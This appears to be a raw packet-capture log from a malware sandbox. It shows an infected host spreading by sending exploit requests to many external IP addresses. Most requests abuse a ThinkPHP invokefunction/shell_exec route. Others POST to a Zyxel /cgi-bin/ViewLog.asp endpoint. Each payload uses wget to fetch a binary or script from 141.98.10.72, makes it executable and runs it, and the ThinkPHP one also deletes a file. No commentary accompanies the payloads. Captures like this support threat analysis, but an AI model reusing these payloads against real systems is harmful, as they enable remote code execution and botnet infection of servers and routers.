                                                        Feb 14, 2024 09:35:32.547175884 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.050939083 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:37.058804035 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:43.202775002 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:55.234050989 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1100192.168.2.143601295.0.188.12880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.274528027 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1101192.168.2.145824495.58.75.22280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.314557076 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.611815929 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:35:31.612025976 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1102192.168.2.143932295.101.10.17080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.422000885 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.623754978 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 36 30 61 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 31 26 23 34 36 3b 34 65 64 30 30 63 66 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a60a655f&#46;1707899731&#46;4ed00cf5</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1103192.168.2.145913695.101.153.4280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.464601040 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.667679071 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 37 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 31 26 23 34 36 3b 64 35 33 31 36 31 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;275a1602&#46;1707899731&#46;d531613</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1104192.168.2.144980295.100.144.24280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.477972984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.694533110 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 65 39 30 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 31 26 23 34 36 3b 38 66 38 30 35 30 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ee90645f&#46;1707899731&#46;8f80503</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1105192.168.2.145043495.216.174.9880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:31.485956907 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:31.710366964 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.22.0
                                                        Date: Wed, 14 Feb 2024 08:35:31 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1106192.168.2.143890831.22.116.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:32.882446051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:33.539021969 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1107192.168.2.145800094.44.143.2468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.000727892 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1108192.168.2.145625831.207.33.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.200129986 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:33.399704933 CET304INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:33 GMT
                                                        Server: Apache
                                                        Content-Length: 126
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1109192.168.2.144245431.136.144.2218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.404073000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.050956964 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.298860073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:37.826808929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.946620941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.930219889 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.409379005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1110192.168.2.144749831.136.214.2008080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:33.404874086 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:34.050939083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.298894882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:37.826819897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.946636915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.930195093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
